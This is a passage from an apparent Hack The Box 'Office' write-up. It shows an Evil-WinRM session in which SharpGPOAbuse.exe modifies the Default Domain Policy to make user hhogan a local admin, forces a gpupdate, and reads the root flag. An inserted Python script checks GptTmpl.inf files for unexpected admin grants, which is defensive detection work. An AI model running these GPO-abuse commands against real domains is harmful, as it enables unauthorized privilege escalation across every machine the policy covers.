*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
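The tool output above shows the change being written to the GPO's GptTmpl.inf (it first reports that the GPO specifies no group memberships, then that a new local admin was added). As an added example, which is my code and not the writeup's or SharpGPOAbuse's, here is the check a defender can run over a GptTmpl.inf pulled from SYSVOL: it parses the [Group Membership] (Restricted Groups) section and lists every principal the template pushes into BUILTIN\Administrators. The sample template is constructed for the example; its Restricted Groups syntax is an assumption about the file format, and the member SID in it is the hhogan SID printed in the tool output above.

```python
# Added example (not from the writeup or from SharpGPOAbuse): a defender-side check that
# parses the [Group Membership] section of a GptTmpl.inf and reports which principals the
# template pushes into the local Administrators group. The sample template below is
# constructed to resemble a Restricted Groups edit; its layout is this example's assumption.
import re

LOCAL_ADMINS_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators

# Constructed sample; the member SID is the hhogan SID printed in the tool output above.
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108
"""

# Keys look like "*<SID>__Members" or "<name>__Memberof"; the leading '*' marks a SID.
_KEY_RE = re.compile(r"\*?(?P<group>.+?)__(?P<kind>Members|Memberof)$")


def parse_group_membership(text):
    """Return {principal: {"Members": [...], "Memberof": [...]}} from [Group Membership].

    Principals may be SIDs (prefixed with '*') or plain names; the prefix is stripped."""
    section, groups = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                   # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()       # new INI section
            continue
        if section != "group membership" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        match = _KEY_RE.match(key.strip())
        if not match:
            continue
        entries = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
        rel = groups.setdefault(match["group"], {"Members": [], "Memberof": []})
        rel[match["kind"]] = entries
    return groups


def find_local_admin_grants(text, allowed=()):
    """Principals this template makes members of BUILTIN\\Administrators, minus an allowlist.

    Both spellings are covered: '*S-1-5-32-544__Members = *X' and '*X__Memberof = *S-1-5-32-544'."""
    groups = parse_group_membership(text)
    grants = list(groups.get(LOCAL_ADMINS_SID, {}).get("Members", []))
    for principal, rel in groups.items():
        if LOCAL_ADMINS_SID in rel["Memberof"] and principal not in grants:
            grants.append(principal)
    return [g for g in grants if g not in allowed]


if __name__ == "__main__":
    # On a real SYSVOL the file is UTF-16: text = open(path, encoding="utf-16").read()
    for sid in find_local_admin_grants(SAMPLE_GPTTMPL):
        print(f"[!] template grants local admin to {sid}")
```

Run against the constructed sample, it reports the hhogan SID as a newly granted local admin; pass the SIDs you expect to see (for instance a sanctioned helpdesk group) in `allowed` so that only unexpected grants are flagged. Pairing this with a watch on the versionNumber attribute and GPT.ini version that the tool output shows being bumped gives a cheap detection for exactly this kind of GPO tampering.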
Update the group policy for the change to take effect:
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/14/2024 9:59 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxx
Root Flag: abd037fa1e9078e44dxxxxxxxxxxxxxxxxx